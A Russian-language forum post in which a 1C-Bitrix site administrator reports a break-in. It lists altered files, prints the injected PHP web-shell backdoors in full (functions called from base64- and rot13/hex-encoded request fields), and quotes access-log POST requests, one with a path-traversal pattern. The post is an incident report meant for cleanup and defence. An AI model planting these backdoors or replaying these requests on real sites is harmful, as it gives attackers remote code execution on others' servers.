Похоже новая волна взлома
2017-05-10 10:48:20.0000000000 ./bitrix/modules/main/include/prolog_after.php
2017-05-10 10:48:18.0000000000 ./bitrix/modules/main/bx_root.php
1970-01-01 03:00:00.0000000000 ./bitrix/templates/vote/default
Пока что просто почистил и поставил на эти файлы только чтение (сменил владельца на root).
Этот взлом мешает корректному обмену с 1С.
Судя по логу, ломали так
2017-05-10 10:48:20.0000000000 ./bitrix/modules/main/include/prolog_after.php
2017-05-10 10:48:18.0000000000 ./bitrix/modules/main/bx_root.php
1970-01-01 03:00:00.0000000000 ./bitrix/templates/vote/default
Код |
---|
cat ./bitrix/templates/vote/default <? define("NO_KEEP_STATISTIC", true); define("NO_AGENT_CHECK", true); define("NO_AGENT_STATISTIC", true); define("NOT_CHECK_PERMISSIONS", true); define("DisableEventsCheck", true); require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php"); if(isset($_REQUEST["state"]) && is_string($_REQUEST["state"])) { $arState = array(); parse_str(base64_decode($_REQUEST["state"]), $arState); echo $arState[0]($arState[1],$arState[2]); die(); } ?> |
Код |
---|
cat ./bitrix/modules/main/bx_root.php <? $bx_root = "/bitrix"; define("BX_ROOT", $bx_root); if(isset($_SERVER["BX_PERSONAL_ROOT"]) && $_SERVER["BX_PERSONAL_ROOT"] <> "") define("BX_PERSONAL_ROOT", $_SERVER["BX_PERSONAL_ROOT"]); else define("BX_PERSONAL_ROOT", BX_ROOT); ?> <? if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "") parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2])))); ?> <? if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "") parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2])))); ?> |
Код |
---|
cat ./bitrix/modules/main/include/prolog_after.php дописано в конце define("BX_CONTROLLER_CLIENT_X", base64_decode("QlhfVE9LRU4=")); if(isset($_POST[BX_CONTROLLER_CLIENT_X]) && !empty($_POST[BX_CONTROLLER_CLIENT_X])){ $APPLICATION->RestartBuffer(); CControllerClient::RunCommand(hex2bin(str_rot13($_POST[BX_CONTROLLER_CLIENT_X])), 0, 0); die(); } define("BX_CONTROLLER_CLIENT_X", base64_decode("QlhfVE9LRU4=")); if(isset($_POST[BX_CONTROLLER_CLIENT_X]) && !empty($_POST[BX_CONTROLLER_CLIENT_X])){ $APPLICATION->RestartBuffer(); CControllerClient::RunCommand(hex2bin(str_rot13($_POST[BX_CONTROLLER_CLIENT_X])), 0, 0); die(); } |
Пока что просто почистил и поставил на эти файлы только чтение (сменил владельца на root).
Этот взлом мешает корректному обмену с 1С.
Судя по логу, ломали так
Код |
---|
200 "POST /bitrix/tools/html_editor_action.php HTTP/1.1" 200 "POST /bitrix/tools/mail_entry.php/. ./. ./. ./bitrix/tools/html_editor_action.php HTTP/1.1" 200 "POST /bitrix/tools/vote/vote_chart.php HTTP/1.1" |